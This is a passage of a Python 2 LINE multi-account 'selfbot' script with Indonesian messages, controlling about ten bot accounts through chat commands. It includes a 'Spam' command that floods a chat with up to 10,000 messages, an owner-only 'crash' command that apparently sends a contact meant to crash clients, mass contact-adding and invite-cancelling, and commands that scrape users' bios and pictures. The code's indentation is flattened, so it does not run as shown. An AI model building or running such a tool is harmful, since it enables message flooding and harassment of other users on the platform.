else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"Admin Ditambahkan")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
elif "Admin remove @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff remove executing"
_name = msg.text.replace("Admin remove @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Admin Dihapus")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
elif msg.text in ["Adminlist","adminlist"]:
if admin == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"Tunggu...")
mc = "|| ADMIN=BABANG ADHI||\n=====================\n"
for mi_d in admin:
mc += "••>" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#--------------------------------------
#-------------- Add Friends ------------
elif "Bot Add @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[Command]Add executing"
_name = msg.text.replace("Bot Add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
ki.findAndAddContactsByMid(target)
kk.findAndAddContactsByMid(target)
kc.findAndAddContactsByMid(target)
ks.findAndAddContactsByMid(target)
k1.findAndAddContactsByMid(target)
k2.findAndAddContactsByMid(target)
k3.findAndAddContactsByMid(target)
k4.findAndAddContactsByMid(target)
k5.findAndAddContactsByMid(target)
except:
cl.sendText(msg.to,"Error")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
#-------------=SC AllBio=---------------- Ganti Bio Semua Bot Format => Allbio: SUKA SUKA KALIAN :D
elif "Allbio:" in msg.text:
if msg.from_ in admin:
string = msg.text.replace("Allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kk.getProfile()
profile.statusMessage = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kc.getProfile()
profile.statusMessage = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ks.getProfile()
profile.statusMessage = string
ks.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k1.getProfile()
profile.statusMessage = string
k1.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k2.getProfile()
profile.statusMessage = string
k2.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k3.getProfile()
profile.statusMessage = string
k3.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k4.getProfile()
profile.statusMessage = string
k4.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k5.getProfile()
profile.statusMessage = string
k5.updateProfile(profile)
cl.sendText(msg.to,"Bio berubah menjadi " + string + "")
#--------------=Finish=----------------
#--------------= SC Ganti nama Owner=--------------
elif "Myname:" in msg.text:
if msg.from_ in admin:
string = msg.text.replace("Myname:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
ks.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k1.getProfile()
profile.displayName = string
k1.updateProfile(profile)
k1.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k2.getProfile()
profile.displayName = string
k2.updateProfile(profile)
k2.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k3.getProfile()
profile.displayName = string
k3.updateProfile(profile)
k3.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k4.getProfile()
profile.displayName = string
k4.updateProfile(profile)
k4.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k5.getProfile()
profile.displayName = string
k5.updateProfile(profile)
k5.sendText(msg.to,"Update Name Menjadi : " + string + "")
#-------------- copy profile----------
elif "Spam " in msg.text:
if msg.from_ in admin and owner:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke cantik <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#-----------------=Selesai=------------------
elif msg.text in ["Bot?"]: #Ngirim Semua Kontak Bot
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ks.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
k1.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Fmid}
k2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Gmid}
k3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Hmid}
k4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Imid}
k5.sendMessage(msg)
#====================================================
elif msg.text.lower() == "crash":
if msg.from_ in owner:
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925"}
cl.sendMessage(msg)
#====================================================
elif msg.text in ["Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
cl.sendMessage(msg)
elif msg.text in ["Creator"]:
msg.contentType = 13
msg.contentMetadata = {'mid': 'u350cc7408cc6cc82e056ee046131f925'}
cl.sendMessage(msg.to, "Add Bosque")
elif msg.text in ["You"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
cl.sendMessage(msg)
elif msg.text in ["愛�プレゼント","Gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
random.choice(KAC).sendMessage(msg)
elif msg.text in ["愛�プレゼント","All gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
kk.sendMessage(msg)
kc.sendMessage(msg)
elif msg.text in ["Cancel","cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Op cancel","Bot cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
G = ks.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
ks.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
ks.sendText(msg.to,"No one is inviting")
else:
ks.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
ks.sendText(msg.to,"Can not be used outside the group")
else:
ks.sendText(msg.to,"Not for use less than group")
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
elif msg.text in ["Buka qr","Open qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"QR Sudah Dibuka")
else:
random.choice(KAC).sendText(msg.to,"Sudah Terbuka Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
elif msg.text in ["Luffy buka qr","Luffy open qr"]:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done Plak")
else:
cl.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Zorro buka qr","Zorro open qr"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = False
kk.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done Plak")
else:
ki.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Sanji open qr","Sanji buka qr"]:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = False
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Plak")
else:
kc.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Tutup qr","Close qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Kode QR Sudah Di Tutup")
else:
random.choice(KAC).sendText(msg.to,"Sudah Tertutup Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
elif msg.text in ["Luffy close qr","Luffy tutup qr"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = True
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done Plak")
else:
ki.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Zorro tutup qr","Zorro close qr"]:
if msg.toType == 2:
X = kk.getGroup(msg.to)
X.preventJoinByTicket = True
kk.updateGroup(X)
if wait["lang"] == "JP":
kk.sendText(msg.to,"Done Plak")
else:
kk.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kk.sendText(msg.to,"Can not be used outside the group")
else:
kk.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Sanji tutup qr","Sanji close qr"]:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = True
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Plak")
else:
kc.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
elif "jointicket " in msg.text.lower():
rplace=msg.text.lower().replace("jointicket ")
if rplace == "on":
wait["atjointicket"]=True
elif rplace == "off":
wait["atjointicket"]=False
cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"]))
elif '/ti/g/' in msg.text.lower():
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
if wait["atjointicket"] == True:
group=cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.mid,ticket_id)
cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name))
elif "Info Group" == msg.text:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
QR = "Close"
else:
QR = "Open"
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + "[•]" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + "[•]" + gCreator + "\n\n[Group Status]\n" + "[•]Status QR =>" + QR + "\n\n[Group Picture]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\nMembers:" + str(len(ginfo.members)) + "\nPending:" + sinvitee)
else:
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\n[Group Status]\nGroup Picture:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif "My mid" == msg.text:
if msg.from_ in admin:
random.choice(KAC).sendText(msg.to, msg.from_)
elif "Mid Bot" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
ks.sendText(msg.to,Dmid)
k1.sendText(msg.to,Emid)
k2.sendText(msg.to,Fmid)
k3.sendText(msg.to,Gmid)
k4.sendText(msg.to,Gmid)
k5.sendText(msg.to,Gmid)
elif "Koplaxs" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,Smid)
elif "Luffy" == msg.text:
if msg.from_ in admin:
ki.sendText(msg.to,mid)
elif "Zorro" == msg.text:
if msg.from_ in admin:
kk.sendText(msg.to,Amid)
elif "Sanji" == msg.text:
if msg.from_ in admin:
kc.sendText(msg.to,Bmid)
#--------------------------------- GIFT -------------------------------------
elif msg.text.lower() in ["gift","Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '40ed630f-22d2-4ddd-8999-d64cef5e6c7d',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
cl.sendMessage(msg)
#----------------------------------------------------------------------------
elif msg.text in ["Wkwkwk","Wkwk","Wk","wkwkwk","wkwk","wk"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
cl.sendMessage(msg)
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hehehe","Hehe","He","hehehe","hehe","he"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Galau"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "9",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["You"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "7",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hadeuh"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Please"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "4",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Haaa"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "3",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Lol"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "110",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hmmm","Hmm","Hm","hmmm","hmm","hm"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "101",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Welcome"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["TL: "]:
if msg.from_ in admin:
tl_text = msg.text.replace("TL: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif msg.text in ["Invite:on"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
elif msg.text in ["Bot1 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cn ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot2 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv1 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = ki.getProfile()
profile_B.displayName = string
ki.updateProfile(profile_B)
ki.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot3 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv2 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = kk.getProfile()
profile_B.displayName = string
kk.updateProfile(profile_B)
kk.sendText(msg.to,"name " + string + " done")
#==================================
#==================================================
elif 'lyric ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('lyric ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif 'wiki ' in msg.text.lower():
if msg.from_ in admin:
try:
wiki = msg.text.lower().replace("wiki ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif msg.text.lower() == 'dul restart':
if msg.from_ in admin:
print "[Command]Like executed"
try:
cl.sendText(msg.to,"Restarting...")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
elif msg.text.lower() == 'ifconfig':
if msg.from_ in admin:
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
if msg.from_ in admin:
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
if msg.from_ in admin:
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif 'instagram ' in msg.text.lower():
if msg.from_ in admin:
try:
instagram = msg.text.lower().replace("instagram ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "======INSTAGRAM INFO USER======\n"
details = "\n======INSTAGRAM INFO USER======"
cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
cl.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'music ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('music ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[3])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'clean invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting。")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#================================================================================
elif 'clear invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif 'link open' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#===========================================================================
elif 'link close' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#============================================================
elif msg.text.lower() == 'ginfo':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[display name]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nmembers:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
#===============================================================
elif 'group list' in msg.text.lower():
if msg.from_ in admin:
gs = cl.getGroupIdsJoined()
L = "『 Groups List 』\n"
for i in gs:
L += "[≫] %s \n" % (cl.getGroup(i).name + " | [ " + str(len (cl.getGroup(i).members)) + " ]")
cl.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif "Invite me" in msg.text:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(i,[msg.from_])
cl.sendText(msg.to, "successfully invited you to all groups")
elif "Steal group pict" in msg.text:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Turn off bots" in msg.text:
if msg.from_ in admin:
try:
import sys
sys.exit()
except:
pass
#==================================================================
elif "Steal bio" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,contact.statusMessage)
except:
cl.sendText(msg.to,contact.statusMessage)
#===========================================================
#=======================================================
elif "T-eng " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-eng ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'en')
cl.sendText(msg.to,trs)
print '[Command] Translate EN'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-japan " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-japan ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'ja')
cl.sendText(msg.to,trs)
print '[Command] Translate japan'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-thai " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-thai ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'th')
cl.sendText(msg.to,trs)
print '[Command] Translate thai'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-id " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-id ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'id')
cl.sendText(msg.to,trs)
print '[Command] Translate ID'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Say " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Say ","")
cl.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
#==========================================================================
elif msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Kode QR Sudah Di Tutup")
else:
random.choice(KAC).sendText(msg.to,"Sudah Tertutup Boss")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
if msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if wait["Protectjoin"] == True:
